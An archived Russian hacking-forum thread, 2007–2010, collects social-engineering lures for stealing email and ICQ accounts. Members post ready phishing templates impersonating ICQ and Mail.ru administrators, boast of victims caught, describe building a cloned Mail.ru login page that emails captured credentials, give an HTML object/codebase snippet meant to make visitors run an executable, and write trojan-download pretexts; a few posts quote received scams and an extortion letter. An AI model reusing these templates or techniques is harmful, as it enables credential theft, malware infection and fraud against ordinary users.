PDA

Просмотр полной версии : Социальная инженерия. приёмы влияния на психику чела.


Kanaris
24.07.2007, 18:59
Здесь разрабатываются тексты писем, сообщений в аськах, и др. Если кому когда-нибудь приходило что-то на мыло, что ну оооооочень вас впечатлило, постим сюда!!!

Принимаются темы:
- как запугать ламера
- как заставить чела перейти по ссылке
- как выманить ответ на секретный вопрос на мыле/сайте и других акках
- как заставить юзера авторизоваться с поддельной страницы авторизации
- как заставить юзера запустить *.exe-файл
- [а также дополнение этого списка]

Kanaris
24.07.2007, 19:06
Категория: как заставить юзера авторизоваться с поддельной страницы авторизации
Лазил по инету, искал взломщиков мыла. Нашёл сайт, где чувак предлагает взлом мыла за 90$. Без предоплаты, типа, всё честно. Зделал у него заказик, сказал, вот тут такой чувак, его нада взломать, ... и дал ему мыло (своё, другое). Мыло было на серваке mail.ru. И вот чё пришло на то мыло:

почему ты мне не пишешь? на этой фотке ты наверное меня не узнаешь. Как прочтёшь письмо, сразу отпишись...

Прикрепленные данные: photo352.jpg
Скачать Удалить

нажимаем ссылку "скачать", открывается страница авторизации. Я чуть не ввёл туда свои реальные данные! Посмотрел в строку адреса - там был адрес вида [Только зарегистрированные пользователи могут видеть ссылки.] и самое прикольное, что этот адрес 123.23.5.45 - принадлежит этому хацкеру. Вводишь туда свои реквизиты, и твой пароль - у хацкера!

Darknezz
17.08.2007, 00:29
мона забрать мыло у лама таким методом:
Например говариш своему другу мол есть такая служба на мейле в которой сидит робот и напоминает забытые пароли. и есть у этого робота одна значительная ошибка. Можно послать запрос
емейл который охота приобрести
пароль(не обязательно)
новый пароль
и в этом же письме нужно указать свой емейл и пароль(здесь обязательно) фишка в том что при двух запросах эта служба поменяет два пароля.
а на самом деле подсовываеш этому другу свой емейл типа robot@mail.ru или если пофантазировать то можно еще придумать. И дело в шляпе

Darknezz
17.08.2007, 19:41
Мне приходило письмо такогого типа: Darknezz спасибо за фотки, посмотреть мои можно сдесь: [Только зарегистрированные пользователи могут видеть ссылки.]*****.net/foto/
Я долго думал какие еще фотки, потом врубился что это либо трой, либо на той странице выполнятся кое-какие сценарии с извлечением айпи.

Darknezz
20.08.2007, 10:32
Для того что-бы заставить юзверя запустить exe файл можно сделать html страницу такого типа:
<html>
<object classid="clsid:10000000-0000-0000-0000-000000000000"
codebase="[Только зарегистрированные пользователи могут видеть ссылки.]">
</object>
</html>

Demolution
26.08.2007, 16:47
вот такая вот бадяга:
---
Аноним написал 25.08.2007 в 14:18:29

Я хочу поделиться с вами одной большой радостью в связи с тем, что в целых двух кошельках системы Webmoney появились огромные, но очень полезные для нас, дыры. Эти дыры заключаются в том, что посланная вами на эти кошельки сумма удваивается и возвращается обратно в ваш кошелек. Не наглеть, потому что кошелек аннулируют, если пришлешь деньги 2 раза в течении 4 часов (Проверено). Так что, лучше за один раз больше послать, чем каждые четыре часа по 2 доллара. Имейте в виду, что максимальная сумма, которую можно послать – 20$ вот этот кошельек: Z867683031976 Торопитесь, если узнают что, это стало известно пользователям Интернета, то халяву прикроют. Сам я наварился на этом прилично. Купил себе навороченный компьютер, в журнале игромания под заголовком "Я видел тебя во сне", и домашний кинотеатр
---
:-D:ROFL::ROFL::ROFL: я нимагу...

Rikiton
03.09.2007, 15:34
Я вот тоже типу на мыло писал, чтобы он взломал мыло. Тоже дал ему другое своё мыло, и он через дня 2 написал:
"Здравствуйте, на Ваше имя отправлена открытка.

Отправитель открытки: <ele*a_fe*ova@mail.ru>

Открытка ждёт Вас по адресу:

[Только зарегистрированные пользователи могут видеть ссылки.]***2ccae894770

Для просмотра перейдите по ссылке или скопируйте ее в адресную строку интернет-браузера. Открытка будет дожидаться Вас в течение 90 дней."
Вроде ничего такого, перехожу по ссыле, и в адресе совсем другое! и написино: "Авторизация"! Чуть не ввёл свой пароль и пользователь! Вот так... ;)

NazGul
06.09.2007, 00:12
ну во первых ламеры это 95% пр.тех кто подключился к интернету(и не имел раньше с ним "дел")без году неделя,но зачем таких ламать?:)
нужны ваши пароли для базы данных
ну такое еще иногда прокатит,среди тех кто верит в полную конфеденциальность в сети(тачнее незнает что таковой не существует),типа мой пасс только у меня и некто его больше незнает:)
пришли свой пасс и получи пасс друга в подарок,напиши 4 волшебные строчки с своим пасом и неактивированным кодом карточки дибилайна и получиш 100 тыщ миллионов и тд, уже не работают
чуш:)))))неужели ктото такое когда то делал))сейчас просто надо быть грамотней,конечно более продвинутые юзеры не купяцо даже на мегаграмотную уловку,а вот "средний класс" ведется,сам проверял;)

-Slon-
22.10.2007, 02:07
Вот один из вариантов письма для угона ICQ. С его помощью я у многих угонял аси..может кому поможет..

Здравствуйте.

Я администратор сервера ICQ в России. Наш сервер (login.icq.com) был подвержен атаке со стороны хакера, что вызвало сбой в нашей базе данных.
Мы боимся, что теперь некоторые наши данные некорректны или были изменены, что может привести к сбоям при подключении или передачи данных по каналам связи ICQ, а в некоторых случаях и к полной не работоспособности данного UIN-а. В некоторых случаях это происходит примерно через 7 дней, после автоматического обновления данных на сервере.
Просим просмотреть следующую информацию, и если что-то неверно, сообщить, мы восстановим данные в базе.
Ваши данные:
UIN: ...............
Ник: ..............
Имя: ............
Пол: ............
Возраст: .........
День рождения: .........................
Интересы: ...................................
Дом
Город: ..................
Пароль: ..........................

Если что-то не так в приведенных выше данных просим Вас отправить нам сообщение на наш почтовый адрес:
adminservicq@rambler.ru
Или сообщить по каналу связи ICQ:
.............
Приносим свои извинения за беспокойство.
С уважением Администратор ICQ.

P.S: Естественно какие то данные можно указать...а где не знаем вписываем любые....

mazart
30.03.2008, 15:43
Не конечно я много кого видал не ну а эти дак просто СУПЕР КАДРЫ.
Сначала кинул 4 на рамблере но безрезультатно, потом написал я это письмо 57 челам но конечно мыла были отборные типа kiska, soska и так далее но результатам я был удевлён из 57 повелись 24 даже попалась админестраторша сайта на долбанном UCOZ'e.

Адрес отпровителя я поставил: administration@support.мail.ru
Само письмо:

Здравствуйте!
Доводим до Вашего сведения, что 18.03.2008 года, в 03:23 мин, группа серверов Mail.ru были атакованы неизвестной группой хакеров, в связи с чем, была повреждена часть базы данных Российских и Украинских пользователей Эл. Адресов.
С целью восстановления базы данных и сохранения вашего почтового ящика, просим Вас изменить пароль к вашему адресу@mail.ru на пароль указанный ниже:

}q@arg|j3g

В противном случае Вы больше не сможете воспользоваться нашими услугами.
По окончанию проверки пароля нашим роботом Вам придёт уведомительное письмо, после которого Вы вновь сможете его изменить.
С уважением администрация Mail.ru

На данное письмо можно не отвечать.


Спасибо Канарису за исправленные ошибки :)

mazart
09.05.2008, 20:03
Вот буквально 20 минут назад заманил чела на фейк:

Здравствуйте (Тута имя)!
Доводим до Вашего сведения, что на Вашем почтовом ящике были обнаружены вирусы, в связи с данной ситуацией мы отключаем Ваш почтовый адрес до 09.06.2008.
Во избежание отключения пройдите повторную авторизацию на специально отведённом месте [Только зарегистрированные пользователи могут видеть ссылки.]ххх.ххх.ххх/ для таких случаев сервера Mail.ru

С уважением администрация Mail.ru

Не было времени писать по лучше (да и это письмо прокатило с первого раза), так как этот чел меня всего заипал, кстати, записал это дело на видео, так что выложу в ближайшее время ...

Zimper
09.05.2008, 22:43
Для того что-бы заставить юзверя запустить exe файл можно сделать html страницу такого типа:
<html>
<object classid="clsid:10000000-0000-0000-0000-000000000000"
codebase="[Только зарегистрированные пользователи могут видеть ссылки.]">
</object>
</html>
при внедрении етого кода на html страницу IE возмущаеться,пишет что невозможно проверить производителя,и блокирует файл.Можна ли ето устранить?

Kanaris
10.05.2008, 02:31
В 8й винде можно было. А в винде ХреновоРаботает (ХР) не знаю

<object classid="clsid:10000000-0000-0000-0000-000000000000"
codebase="[Только зарегистрированные пользователи могут видеть ссылки.]">

о_О ненада у нас держать трояны! а то из МВД будут звонить, шантажировать (уже было 2 раза)

Zimper
10.05.2008, 02:42
В 8й винде можно было. А в винде ХреновоРаботает (ХР) не знаю


Вообщето ето не од винды зависит,а от IE

666™Fred
30.05.2008, 14:09
Я новичок. Сегодня попробовал. Первый ящик есть. Сделал так:
Создал страницу с не бросающимся в глаза именем аля [Только зарегистрированные пользователи могут видеть ссылки.] в полном стиле самого знаменитого почтовика. Такой же синий фон, чуть выше логотипа, строка "Вход в почту" затем Логин и Пароль и поля для ввода. Тут же выбор домена. Ну короче говоря все точь-в-точь.
Создал в своем почтовом менеджере письмо типа "Вам пришла открытка" со все тем же логотипом администрации и такими же строчками, которые используют они. Такая строка : Вы можете посмотреть ее на странице Мои подарки. "Мои подарки" - ссылка на моя страницу, где пользователь "входит в почту". Нажимает "Войти" и введенные данные отсылаются мне на имейл. А его кидает на следующую страницу с черным фоном, тем же логотипом и словами "А теперь подумай что ты сделал..." и через 5 секунд переадресация на сайт почты. Красиво, без особых проблем. Но нет гарантии что жертва введет логин и пароль. Вроде все)

}{@CI{ER666
21.12.2009, 02:10
Типа как заставить чела перейти ( или как там... по ссылке, (или скачать\посмотреть, картинку +сниффер =) )
пишем типа, от имени девки (на аватаре ставим, приличную (без пошлостей ;)) фотку)
и типа шлем жертве:
Привет, вот, ты просил мои эротические фото:
(ссылка на фото)
Идет только для пацанов, но и у девок есть исключения =)
И еще типа, что бы скачал трой:
Привет, знаешь как сделать, что бы не смогли взломать твой ящик?
Скачай этот патч (ссылка на трой =) ), и запусти,
он изменяет настройки безопасности, так, что твой пароль всегда будет шифроваться если кто-то попробует зайти с него!
или
Скачай эту прогу: (ссыль на трой)
Это само-устанавливающийся скрипт, который не дает взломать твой ящик!
Я не верил*-а, но меня столько раз раньше ломали, а теперь сижу уже больше 2 лет, на одном ящике !
Есть грамматические ошибки, так что проверьте на всякий случай, удачи!
(канешно ведутся не все, но в основном ламмеры, ведутся)

DOCTYPES
21.12.2009, 02:16
Мне на 3 ящика пришли не давно письма что меня Жданов добавил))) я тока на 1 из них имел вконтакте, не прошёл по ссылке т.к. отключены оповещения а рассылка была походу весьма массовой, почты на разных серваках были!

Zemond
15.02.2010, 13:46
Лучший способ впарить какую-либо фотку - это спросить ну и что, как тебе она, что ты там видишь, а как тебе фон, после пары таких вопрос в большей половине случаев ее открывают =)
При атаке на определенного человека, лучше спросить его увлечения, а потом спустя пару дней общения дать сайт\фотку\програмку по его хобби, если выбирать противоположный пол, то шансов войти в расположение становится больше.

leaderru
13.06.2010, 17:47
вот недавно пришло письмо от admin@softoroom.net с таким содержанием:

Здравствуйте администратор сайта мойсайт.ru
Я, почетный член арбитражной комиссии, электронной платежной системы WebMoney, ник - FrichX, заявляю Вам, как администратору сайта domenyreg.ru, о том, что располагаю компрометирующими материалами, относительно Вашей деятельности в сети Интернет, которые нам любезно предоставил Ваш хостинг-провайдер iphoster.ru.
Мною, на сайте WebMoney, уже была создана персональная страница претензий [Только зарегистрированные пользователи могут видеть ссылки.] , предназначенная для публикации жалоб на Ваш ресурс, и я предлагаю Вам, добровольно внести пожертвование, направленное на развитие платежной системы WebMoney, для приостановления этого негативного процесса.
Деньги от Вас, должны быть переданы лично мне на емаил F R I C H X @meta.ua (удалите лишние пробелы), в виде реквизитов Паймер-чеков, на общую сумму 600 WMZ, не познее 8 июня 2010 года, иначе, помимо публикации на вышеуказанной странице претензий, всех поданных нам претензий на Ваш сайт, я опубликую этот компромат также и в своих личных, многочисленных блогах, т.о. кроме блокирования вашего WM ID, вместе со всеми Вашими электронными деньгами, я могу Вам гарантировать существенный отток Ваших клиентов, а может быть и вовсе полное блокирование домена domenyreg.ru, его регистратором.
Вот ссылка на всего одну из многочисленных моих работ (множество подобных документов найдете через поиск ключевых слов \"FrichX\" и например \"gullon\"):
[Только зарегистрированные пользователи могут видеть ссылки.]
Здесь, как видите, обсуждается ставший вдруг скандальным ресурс gullon.eu, ранее безупречной и процветающей испанской кондитерской фирмы Gullon, который был полностью блокирован арбитражным сервисом WebMoney и лично мною, теперь его место вполне может занять мойсайт.ru!
Так что не тяните, потому что потом это будет гораздо дороже, а может быть и вовсе станет уже не возможно остановить негативный процесс, инициированный мною.
Также хочу Вас предупредить о том, что я не намерен вступать с Вами в переговоры, и в виде ответа на данное предупредительное сообщение, Вы можете отправить мне только реквизиты Paymer-чеков в выше оговоренной сумме, на выше указанный адрес, и ничего больше!

FrichX

P.S. Любителям поскандалить, и тем, кто желает обвинить меня в мошенничестве или вымогательстве, советую объективно взвешивать аргументы и свои возможности, с учетом того, что у меня хорошие связи не только в WebMoney, электронных СМИ,
доменных регистраторов и хостерах, но и в силовых структурах Украины!

Хотел меня на бабло развести я просто в поисковиках поискал его ник и проигнорировал письмо.
Кста письмо было прислано 2 июня прошло уже 11 дней и ничего пока не произошло ни со мной, ни с сайтом, ни с вм!